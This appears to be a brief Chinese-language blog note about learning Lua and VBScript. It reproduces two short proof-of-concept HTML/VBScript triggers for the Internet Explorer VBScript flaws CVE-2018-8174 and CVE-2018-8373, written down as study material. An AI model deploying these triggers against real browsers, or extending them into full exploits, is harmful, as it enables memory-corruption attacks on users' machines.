Lua
条评论最近看了一下深度学习,用Lua 写的。。
然后前端时间又报出了2个vb的CVE ,看了看POC,很简单的溢出。
poc 如下:
CVE-2018-8174 1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26<html>
<meta http-equiv="X-UA-Compatible" content="IE=10" />
<script language="VBScript">
dim b
dim c
Class cla1
Private Sub Class_Terminate
set c = b
b = 0
End Sub
Function test
msgbox 3
End Function
End Class
set b = New cla1
b = 0
c.test
</script>
</html>
CVE-2018-8373 1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21<html>
<meta http-equiv="X-UA-Compatible" content="IE=8" />
<script type="text/vbscript">
Class MyClass
Dim array()
Private Sub Class_Initialize
ReDim array(2)
End Sub
Public Default Property Get P
ReDim Preserve array(1)
End Property
End Class
Set cls = New MyClass
cls.array(2) = cls
</script>
</html>
可恶啊。所以又搞了下 vb 的测试。
那么,就是学了下 VBScript 和 Lua 。看看有没有什么值得记录一下的地方,抽空来接着写一些。